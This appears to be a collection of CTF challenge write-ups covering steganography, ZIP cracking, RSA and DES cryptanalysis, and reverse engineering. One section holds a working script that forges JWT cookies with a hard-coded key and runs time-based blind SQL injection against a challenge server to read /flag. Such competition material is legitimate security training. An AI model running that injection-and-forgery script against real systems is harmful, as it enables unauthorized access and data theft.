<h2 id="pintu"><a class="header" href="#pintu">PINTU</a></h2>
<pre><code class="language-python">from PIL import Image
import os
# create a new image size of 4000x2000 pixels and black background
pic = Image.new('RGB',(4000,2000),(0,0,0))
# list all image files
img_list = os.listdir('./img')
for i in range(len(img_list)):
print("./img/{}".format(img_list[i]))
# read image and reads the width and height of the image from the file header
f = open(f'./img/{img_list[i]}','rb').read()
w,h = f[6],f[8]
img = Image.open(f'./img/{img_list[i]}')
# create image with 32 columns and 18 rows
pic.paste(img,(32*w,18*h))
pic.save("all_image.png")
</code></pre>
<h2 id="tiger"><a class="header" href="#tiger">tiger</a></h2>
<pre><code class="language-sh">cat png-key.txt | rot47 decode
conda activate py27
python lsb.py extract key.png-stego.png gen.txt 28a217fe
cat gen.txt
unzip -Z flag_1.zip
bkcrack -C flag_1.zip -c information.txt.txt -p information.txt.txt
bkcrack -C flag_1.zip -c flag -k 968eae79 e129f7a6 43893e7a -d flag
qrcli decode flag.png &gt; zero.txt
https://yuanfux.github.io/zero-width-web/ decode content
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
https://www.guballa.de/vigenere-solver decode vigenere
flag{866d3755-c358-5119-abeb-bda666a8099d}
</code></pre>
<h2 id="外太空的秘密"><a class="header" href="#外太空的秘密">外太空的秘密</a></h2>
<pre><code class="language-python">print("q1:{}".format(pow(9,9)))
s=['A','C','G','T','R','N','D','E','G']
cnt=0
for i in range(9):
for j in range(9):
for k in range(9):
for m in range(9):
for n in range(9):
for o in range(9):
for p in range(9):
for q in range(9):
for r in range(9):
_str=s[i]+s[j]+s[k]+s[m]+s[n]+s[o]+s[p]+s[q]+s[r]
cnt+=1
if _str=='AAAARNDEG':
print("q2:{}".format(cnt))
if cnt==1001:
print("q3:{}".format(_str))
</code></pre>
<h2 id="rsa256"><a class="header" href="#rsa256">rsa256</a></h2>
<pre><code class="language-python">openssl rsa -pubin -in public.key -text -modulus
e = 65537
int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
factordb 87982816287542607821348020319142008042005562918106976160430773236821410039557
p=274473488606178722897600533120866465659 q=320551236967671239609994506214257226623
import gmpy2
import rsa
n = int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
p = 274473488606178722897600533120866465659
q = 320551236967671239609994506214257226623
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
</code></pre>
<h2 id="ziji"><a class="header" href="#ziji">ziji</a></h2>
<pre><code class="language-bash"># python2 decomress_zlib.py
# file:///usr/share/webapps/cyberchef/index.html#recipe=From_Hex('None')
# get 1111111000100001101...
# 用01画图1的话(0,0,0),0的话(255,255,255)
</code></pre>
<pre><code class="language-python"># decomress_zlib.py
# 解压zlib
import zlib
import binascii
idat ="789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A45588138833A170A2071DDCD18219DB8C0D465D8B6989719645ED9C11C36AE3ABDAEFCFC0ACF023E77C17C7897667".decode("hex")
result = binascii.hexlify(zlib.decompress(idat))
print(result)
</code></pre>
<pre><code class="language-python"># draw_img.py
# 像素画图
from PIL import Image
import os
import math
# 用01画图1的话(0,0,0),0的话(255,255,255)
bins = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011"
size = int(math.sqrt(len(bins)))
# create a new image size of size*size pixels and black background
pic = Image.new('RGB',(100,100),(0,0,0))
index = 0
for i in range(size):
for j in range(size):
if bins[index]=="0":
pic.putpixel([j,i],(255,255,255))
index+=1
pic.save("all_image.png")
</code></pre>
<h2 id="xor很心疼你"><a class="header" href="#xor很心疼你">Xor很心疼你</a></h2>
<pre><code class="language-python">#***Task
# Python3
from secret import flag
import random
import base64
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
r = random.randint(2, 250)
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
    """Reseed the module-level PRNG with x and return its next 8 random bits.

    The result is an int in 0..255 and depends only on x. Calling this
    resets the state of the shared ``random`` generator.
    """
    random.seed(x)
    next_byte = random.getrandbits(8)
    return next_byte
def encrypt(plaintext, key):
# XORs each character code with a value derived from a chain of f() calls and the module-level r,
# then returns the result base64-encoded.
# Review note: f() returns 8 bits, so after the first call below key is one of at most 256 values
# whatever size the original key had. Together with r (2..250) the whole keystream is fixed by
# a few tens of thousands of possible states, which is why a known plaintext prefix suffices to find it.
plaintext = list(map(ord, plaintext))
# 20 warm-up iterations of the key chain before any output is produced
for _ in range(20):
key = f(key)
assert key != 0
for i in range(len(plaintext)):
key = f(key)
# keystream value for position i, in 0..250
tmp = (key * r) % 251
assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return base64.b64encode(plaintext)
m = generate(random.randint(200, 300)) + flag + generate(random.randint(200, 300))
c = encrypt(m, random.getrandbits(128))
print(c)
# b'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'
#***Solution
# Python3
import random
import base64
cc=b'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'
cc=base64.b64decode(cc)
flag = 'hsctf{'
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
#assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return plaintext
def decrypt(ciphertext, key):
ciphertext=list(ciphertext)
for i in range(len(ciphertext)):
key = f(key)
tmp = (key * r) % 251
ciphertext[i] = ciphertext[i] ^ tmp
ciphertext = bytes(ciphertext)
return ciphertext
for r in range(2,251):
for key in range(1,256):
m = flag
c = encrypt(m, key)
if(c in cc):
print(r)
print(key)
print(c)
print(cc.index(c))
r=187
key=34
pos=247
mm=decrypt(cc[247:],key)
print(mm)
</code></pre>
<h2 id="晋升之路"><a class="header" href="#晋升之路">晋升之路</a></h2>
<pre><code class="language-python">###################Solution
import requests
import time
import json
import hmac
import hashlib
import base64
import urllib
header = {
"alg": "SHA256",
"typ": "JWT",
}
secret_key = 'keyfe7dc29e5e3d3f066e5a8a15ba135259'
def b64_encode(s):
return base64.b64encode(s)
def b64_decode(s):
return base64.b64decode(s)
def encode_(secret, header, payload):
header_json = json.dumps(header,separators=(',', ':'), sort_keys=True)
segments = []
segments.append(b64_encode(header_json))
segments.append(b64_encode(payload))
msg = '.'.join(segments)
hm = hmac.new(secret, msg, digestmod=hashlib.sha256)
hm_base64 = b64_encode(hm.digest())
segments.append(hm_base64)
token = '.'.join(segments)
return token
def change(source):
to=''
for c in source:
to+='\u00'+hex(ord(c))[2:]
return to
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
url='http://eci-2ze1tsbvbckimbhvrqqu.cloudeci1.ichunqiu.com:80/'
flag=''
for i in range(1,50):
left=33
right=128
while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select/**/binary/**/load_file(0x2f666c6167)),{i},1)&gt;binary/**/{mid})/**/and/**/sleep(2)^'".format(i=i,mid=hex(mid))
data='{"data":"0'+change(payload)+'"}'
cookies={
'BestScore':urllib.quote(encode_(secret_key,header,data)),
'CellState':'eyJhbGciOiJTSEEyNTYiLCJ0eXAiOiJKV1QifQ%3D%3D.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%3D%3D.N5Z2xi2%2F64lMHNC81TDUZUS2EIlizpCNcFG3p78WOAQ%3D'
}
mid=(left+right)/2
t1=time.time()
requests.get(url,headers=headers,cookies=cookies)
t2=time.time()
if t2-t1 &gt;1:
left=mid
else:
right=mid
print left,right
flag+=chr(right)
print flag
#python2 jinsheng.py
</code></pre>
<h2 id="wuhen"><a class="header" href="#wuhen">WuHen</a></h2>
<p>分析程序主动去触发divzero异常说明有东西隐藏在异常。通过seh去找
start() -&gt; scrt_common_main_seh() -&gt; initterm((_PVFV *)&amp;First, (_PVFV *)&amp;Last); -&gt; 进到First -&gt; sub_7FF781AC1000 -&gt; 7FF781AC2390
发现这里是一个DES算法。rand()是固定</p>
<pre><code class="language-bash">else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
{
v8 = 0;
*(_QWORD *)(a1[1] + 72) = 0i64;
qmemcpy(S1, "鏷-%嫋", 8);
*(_DWORD *)&amp;S1[12] = 0xD8A5EDAC;
*(_DWORD *)&amp;S1[16] = 0x23E71CCB;
*(_DWORD *)&amp;S1[20] = 0x169DDCDA;
*(_DWORD *)&amp;S1[24] = 0x2DFE7A0;
*(_DWORD *)&amp;S1[28] = 0x40CA83C; // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
KEY[0] = rand();
KEY[1] = rand();
KEY[2] = rand();
KEY[3] = rand();
KEY[4] = rand();
KEY[5] = rand();
KEY[6] = rand();
KEY[7] = rand();
ka = *(_QWORD *)KEY; // 2923BE84E16CD6AE
for ( i = 0i64; i != 32; i += 8i64 )
*(_QWORD *)&amp;In1[i] = Des(*(_QWORD *)&amp;In1[i], ka);
for ( j = 0i64; j != 32; ++j )
{
if ( In1[j] != S1[j] )
break;
++v8;
}
if ( v8 == 32 )
*(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
return 0xFFFFFFFFi64;
}
</code></pre>
<p>经过超级长的时间调试找到魔改点在循环左移处改成了左移2而且这个是小端的传值都是反向处理一下。</p>
<pre><code>for j in range(step):
t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
</code></pre>
<pre><code class="language-python">==&gt; main.py &lt;==
from des import Decryption
key = bytes.fromhex('2923BE84E16CD6AE')[::-1]
enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
enc = bytes.fromhex(enclist[i:i + 16])[::-1]
res = Decryption(enc, key)
print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==&gt; CreateSubkey.py &lt;==
MaxTime = 16
# 生成子密钥的置换表1将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8,
16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55,
30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53,
46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)
def Listmove(l, step):
    """Rotate a list to the left by ``step`` positions and return the new list.

    The input list is not modified.
    """
    head, tail = l[:step], l[step:]
    return tail + head
def Subkey(key): # derive the round subkeys
# key is a sequence of '0'/'1' characters (64 entries are indexed through key_table1).
# Returns a list of MaxTime subkeys, each a list of 48 '0'/'1' characters.
keyresult = []
key0 = [0 for i in range(56)]
# permuted choice 1: 64 key bits down to 56
for i in range(len(key_table1)):
key0[i] = key[key_table1[i] - 1]
# generate the 16 subkeys
for i in range(MaxTime):
key1 = [0 for i in range(48)]
# number of shift steps for this round
step = STEP_TABLE[i]
# if (i == 0 or i == 1 or i == 8 or i == 15):
# step = 1
# else:
# step = 2
# split into two 28-bit halves
tmp1 = key0[0:28]
tmp2 = key0[28:56]
# print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
# shift step: this replaces the plain rotate-left kept in the commented lines below
# tmp1 = Listmove(tmp1, step)
# tmp2 = Listmove(tmp2, step)
for j in range(step):
# Each step shifts the 28-bit half left by 2 and ORs in only bit 26 of the old value as the new bit 0.
# Bit 27 is discarded and bit 1 of the result is always 0, so this is not a full rotate;
# it is where this key schedule departs from standard DES.
t1 = d(tmp1) &lt;&lt; 2 &amp; 0xfffffff | d(tmp1) &gt;&gt; 26 &amp; 1
t2 = d(tmp2) &lt;&lt; 2 &amp; 0xfffffff | d(tmp2) &gt;&gt; 26 &amp; 1
tmp1 = list(f'{t1:028b}')
tmp2 = list(f'{t2:028b}')
# tmp1 = Listmove(tmp1, step*2)
# tmp2 = Listmove(tmp2, step*2)
# join the two halves again; the shifted state carries over to the next round
key0 = tmp1 + tmp2
# permuted choice 2: 56 bits down to 48
for j in range(len(key_table2)):
key1[j] = key0[key_table2[j] - 1]
# store this round's subkey
# log(i, key1, tmp1, tmp2)
keyresult.append(key1)
# the returned list holds the subkey of every round, in round order
return keyresult
def log(i, key1, tmp1, tmp2):
s = int(''.join(tmp1), 2)
hex1 =int(''.join(tmp2), 2)
hex2 = int(''.join(key1), 2)
print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')
==&gt; des.py &lt;==
import CreateSubkey as cs
import F_function as f
# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]
# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])
# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
# Encrypts one 8-byte block with the 8-byte key using a 16-round Feistel structure and returns 8 bytes.
# Subkeys come from cs.Subkey(), so the output follows this listing's modified key schedule.
text = Hex2bin(plaintext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0) # initial permutation (presumably 0 selects IP and 1 its inverse; f.IP is defined elsewhere)
L = text1[:32]
R = text1[32:64]
for i in range(16):
# round function on the right half: expand, mix with the subkey, substitute, permute
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[i])
# print('xor:', hex(int(''.join(tmp), 2)))
tmp = f.S_replace(tmp)
# print('S:', hex(int(''.join(tmp), 2)))
tmp = f.P_replace(tmp)
# print('P:', hex(int(''.join(tmp), 2)))
tmp = f.Xor(tmp, L)
# print('pres ^ L:', hex(int(''.join(tmp), 2)))
L = R
R = tmp
# swap the halves before the final permutation
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
def Decryption(ptext, key):
    """Decrypt a single 64-bit block and return it as 8 bytes.

    Same structure as Encryption, with the subkeys applied in reverse
    order (index 15 down to 0). ptext and key are bytes-like.
    """
    bits = Hex2bin(ptext)
    schedule = cs.Subkey(Hex2bin(key))
    state = f.IP(bits, 0)  # initial permutation
    left = state[0:32]
    right = state[32:64]
    for round_no in reversed(range(16)):
        feistel = f.Extend(right)
        feistel = f.Xor(feistel, schedule[round_no])
        feistel = f.S_replace(feistel)
        feistel = f.P_replace(feistel)
        left, right = right, f.Xor(feistel, left)
    # The halves are swapped once more before the inverse permutation
    return bin2Hex(f.IP(right + left, 1))
==&gt; F_function.py &lt;==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
def int2bit(n):  # integer 0..15 -> four bit characters
    """Return the four low bits of n as a list of '0'/'1' strings, most significant first."""
    digits = [None] * 4
    for pos in (3, 2, 1, 0):
        digits[pos] = str(n % 2)
        n = int(n / 2)
    return digits
# Initial permutation: op == 0 applies IP_table, op == 1 applies the inverse table
def IP(text, op):
    """Permute 64 positions of text; returns None for any other op value."""
    if op == 0:
        return [text[src - 1] for src in IP_table]
    if op == 1:
        return [text[src - 1] for src in Inv_IP_table]
# Expansion: 32 positions in, 48 positions out
def Extend(text):
    """Select entries of text through extend_table (1-based), repeating some of them."""
    return [text[src - 1] for src in extend_table]
# S-box substitution
def S_replace(text):
    """Map 48 bit characters to 32 through the eight S-boxes in S.

    Each group of six bits picks a row from its outer two bits and a
    column from its inner four; the table value is written out as four bits.
    """
    out_bits = []
    for box_no in range(8):
        base = box_no * 6
        b0, b1, b2, b3, b4, b5 = (int(text[base + off]) for off in range(6))
        row = 2 * b0 + b5
        column = 8 * b1 + 4 * b2 + 2 * b3 + b4
        out_bits.extend(int2bit(S[box_no][row * 16 + column]))
    return out_bits
# P permutation
def P_replace(text):
    """Reorder 32 positions of text according to P_table (1-based entries)."""
    return [text[src - 1] for src in P_table]
# XOR of two bit sequences
def Xor(bit1, bit2):
    """XOR bit1 with bit2 position by position over len(bit1); returns '0'/'1' strings."""
    return [str(int(bit1[pos]) ^ int(bit2[pos])) for pos in range(len(bit1))]
</code></pre>
<h2 id="two-old-man"><a class="header" href="#two-old-man">two old man</a></h2>
<pre><code class="language-python">#***Task
from Crypto.Util.number import getPrime, bytes_to_long
from gmpy2 import next_prime
from os import urandom
p = getPrime(512)
# q is the very next prime after p, so the two factors are almost equal and
# n = p * q can be split by Fermat's method. RSA primes have to be generated
# independently of each other.
q = next_prime(p)
f = open('flag.txt', 'rb')
# 80 random bytes are appended to the flag before it becomes an integer
flag = bytes_to_long(f.read() + urandom(80))
f.close()
n = p * q
# noise = (p-1)! mod n
# NOTE(review): with a 512-bit p this loop cannot finish as written; presumably
# the value was obtained another way when the challenge was built — confirm.
noise = 1
for i in range(1, p):
    noise = (noise * i) % n
e = 65537
# The blinded message is encrypted without padding
m = noise * flag % n
c = pow(m, e, n)
f = open('cipher.txt', 'w')
f.write(f'n = {n}\n')
f.write(f'c = {c}\n')
f.close()
# n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
# c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
#***Solution
# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce
n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161
# Private exponent from the known factors, then plain RSA decryption
d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
# m = (p-1)! * flag mod n. By Wilson's theorem (p-1)! = -1 = p-1 (mod p),
# so multiplying by the inverse of p-1 leaves flag mod p.
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
# Modulo q: (q-1)! = (p-1)! * p * (p+1) * ... * (q-1), and (q-1)! = q-1 (mod q).
# s is the product over range(p, q), which is short because q follows p closely.
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
# s now holds (p-1)! mod q
s = d2 * (q - 1) % q
# ... and d2 its inverse, which removes the noise factor modulo q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
# Combine both residues, then drop the 80 random bytes the task appended
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'
</code></pre>
<h2 id="tupian"><a class="header" href="#tupian">tupian</a></h2>
<pre><code class="language-bash">open Stegsolve, open the gif image
Analyse-&gt;frame browser
convert new_gif.gif -coalesce xx_%05d.png
Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
base64_text -d Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
catch_the_dynamic_flag_is_qumte_simple
</code></pre>
<h2 id="train"><a class="header" href="#train">Train</a></h2>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import*
from hashlib import sha256
import socketserver
import signal
import string
import random
from secret import flag
banner = br'''
.oooooo..o oooo oooo ooooooooooooo o8o
d8P' `Y8 `888 `888 8' 888 `8 `"'
Y88bo. ooo. .oo. .oo. .oooo. 888 888 888 oooo d8b .oooo. oooo ooo. .oo.
`"Y8888o. `888P"Y88bP"Y88b `P )88b 888 888 888 `888""8P `P )88b `888 `888P"Y88b
`"Y88b 888 888 888 .oP"888 888 888 888 888 .oP"888 888 888 888
oo .d8P 888 888 888 d8( 888 888 888 888 888 d8( 888 888 888 888
8""88888P' o888o o888o o888o `Y888""8o o888o o888o o888o d888b `Y888""8o o888o o888o o888o
'''
n0 = 30798082519452208630254982405300548841337042015746308462162479889627080155514391987610153873334549377764946092629701
g = 64146569863628228208271069055817252751116365290967978172021890038925428672043
def TrainHash(msg):
    """Fold the characters of msg into n0 with multiplier g and return an integer.

    `n &amp; (1&lt;&lt;383)` keeps a single bit, so after it runs n is either 0 or
    2**383: the function can return only two different values for a
    non-empty message, and equal outputs for different inputs are the norm.
    Keeping the low 383 bits would need the mask (1&lt;&lt;383) - 1.
    NOTE(review): indentation was lost in this listing; the mask is placed
    inside the loop here — confirm against the original file.
    """
    n = n0
    # msg is a str: every character is turned into its code point
    msg = map(ord,msg)
    for i in msg :
        n = g * (n+i)
        n = n &amp; (1&lt;&lt;383)
    return n - 0xf5e33dabb114514
table = string.ascii_letters+string.digits
MENU = br'''
&lt;OPTION&gt;
'''
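class Task(socketserver.BaseRequestHandler):
    """Connection handler for the Train challenge service.

    A client first solves a SHA-256 proof of work and then submits two
    strings; the flag is sent when TrainHash() gives the same value for
    both and their last 50 encoded bytes are equal. Nothing in handle()
    requires the two strings to differ.
    NOTE(review): the listing lost its indentation, so the nesting of the
    two checks in handle() is reconstructed — confirm against the original.
    """

    def _recvall(self):
        """Read until a recv() returns fewer than BUFF_SIZE bytes; return the stripped data.

        A message whose length is an exact multiple of BUFF_SIZE keeps the
        loop waiting for one more recv().
        """
        BUFF_SIZE = 2048
        data = b''
        while True:
            part = self.request.recv(BUFF_SIZE)
            data += part
            if len(part) &lt; BUFF_SIZE:
                break
        return data.strip()

    def send(self, msg, newline=True):
        """Send msg (bytes), by default followed by a newline; failures are ignored."""
        try:
            if newline:
                msg += b'\n'
            self.request.sendall(msg)
        except Exception:
            # Best effort, as before, but no longer swallowing SystemExit or
            # KeyboardInterrupt the way a bare `except:` does.
            pass

    def recv(self, prompt=b'SERVER &lt;INPUT&gt;: '):
        """Send prompt without a newline and return the client's reply."""
        self.send(prompt, newline=False)
        return self._recvall()

    def proof_of_work(self):
        """Ask for the four missing leading characters of a 20-character string.

        Returns the hex digest as str on success and False otherwise.
        NOTE(review): `random` is not a cryptographic generator;
        `secrets.choice` would make the challenge string unpredictable.
        """
        proof = (''.join([random.choice(table)for _ in range(20)])).encode()
        sha = sha256(proof).hexdigest().encode()
        self.send(b"[+] sha256(XXXX+" + proof[4:] + b") == " + sha )
        XXXX = self.recv(prompt = b'[+] Plz Tell Me XXXX :')
        if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
            return False
        return sha.decode()

    def handle(self):
        """Run one session: proof of work, banner, then the two-string check."""
        # SIGALRM is delivered after 30 seconds; no handler is installed in this file's visible code
        signal.alarm(30)
        FirstBlockHash = self.proof_of_work()
        if not FirstBlockHash:
            self.request.close()
            # Stop here: the original fell through and went on to use the
            # closed socket, which ends in an unhandled error in recv().
            return
        self.send(banner)
        self.send(b"\nPlease give me 2 strings that are same when are hashed =.= ")
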